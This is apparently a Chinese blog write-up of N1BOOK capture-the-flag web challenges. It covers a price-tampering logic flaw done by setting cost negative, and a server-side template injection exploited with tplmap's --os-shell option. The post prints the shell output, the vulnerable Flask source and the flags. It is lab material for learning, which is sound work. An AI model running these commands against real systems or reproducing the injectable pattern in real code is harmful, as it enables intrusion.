🍬 博主介绍👨🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!目录
前言
[第三章 web进阶]逻辑漏洞
1、登录
2、挣钱
3、买flag
[第三章 web进阶]SSTI
SSTI(模板注入)
自动化工具tplmap
1、自动化检测模块注入
2、建立交互式shell
3、flag
前言
N1BOOK是Nu1L Team为方便读者打造的免费平台,读者可在上面享受书籍相关资源以及查阅勘误。
[第三章 web进阶]逻辑漏洞
FLAG{you_can_got_it}
1、登录
首先是个登录页面,随便输入一个数字,然后点击提交,就可以到购买页面
2、挣钱
像默认看到flag,我们肯定打算购买flag这个商品,然后再拿flag
显示钱不够,一般情况下我们可以把cost改为负数,就可以实现挣钱,然后再购买flag,但是这个题目有个bug,只能在其他两个商品里面才可以挣钱
把cost改成负数,页面这样,说明挣钱了,然后我们后面就可以直接购买flag了
3、买flag
购买成功,成功拿到FLAG{you_can_got_it}
[第三章 web进阶]SSTI
n1book{eddb84d69a421a82}
SSTI(模板注入)
一打开,有password提示的关键字
我们这里尝试利用password进行传参,然后验证模块注入,因为题目提示是SSTI(模板注入)
SSTI代表模板注入(Server-Side Template Injection),它是一种Web应用程序中常见的安全漏洞。模板注入指的是将用户提供的数据不正确地插入到网页模板引擎中,从而导致恶意代码的执行。
在许多Web应用程序中,使用模板引擎来生成动态内容,例如展示用户生成的HTML,发送电子邮件等。模板引擎通常使用类似于{{变量名}}的占位符,通过替换这些占位符来生成最终的输出。然而,如果应用程序不正确地处理用户提供的数据,攻击者可以通过注入特殊构造的恶意代码来修改模板的行为。
SSTI攻击的危害取决于具体的应用程序和模板引擎。一些可能的后果包括执行任意代码、绕过访问控制、获取敏感信息等。
手动测试了,发现没错就是模块注入
自动化工具tplmap
GitHub - epinna/tplmap: Server-Side Template Injection and Code Injection Detection and Exploitation ToolServer-Side Template Injection and Code Injection Detection and Exploitation Tool - GitHub - epinna/tplmap: Server-Side Template Injection and Code Injection Detection and Exploitation Tool
https://github.com/epinna/tplmap
1、自动化检测模块注入
E:\tool\tplmap-master>python tplmap.py -u "http://f299e12e-b624-4a93-84b8-f94568c2922a.node5.buuoj.cn:81/?password="
2、建立交互式shell
python tplmap.py -u "http://f299e12e-b624-4a93-84b8-f94568c2922a.node5.buuoj.cn:81/?password=" --os-shell
3、flag
FLAG: n1book{eddb84d69a421a82}
posix-linux $ ls
app
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
posix-linux $ ls -la app
total 24
drwxr-xr-x 1 root root 27 Jun 26 2020 .
drwxr-xr-x 1 root root 17 Feb 9 09:23 ..
-rw-r--r-- 1 root root 6148 Jun 26 2020 .DS_Store
-rw-r--r-- 1 root root 112 Jun 26 2020 Dockerfile
-rw-r--r-- 1 root root 194 Jun 26 2020 docker-compose.yml
-rwxr-xr-x 1 root root 36 Jun 26 2020 entrypoint.sh
-rw-r--r-- 1 root root 464 Jun 26 2020 server.py
posix-linux $ cat /app/server.py
from flask import Flask
from flask import render_template
from flask import request
from flask import render_template_stringapp = Flask(__name__)# FLAG: n1book{eddb84d69a421a82}@app.route('/')
def index():password = request.args.get("password") or ""template = '''<p>password is wrong: %s</p>''' %(password)return render_template_string(template)if __name__ == '__main__':app.run(debug=False, host="0.0.0.0", port=8000)
posix-linux $
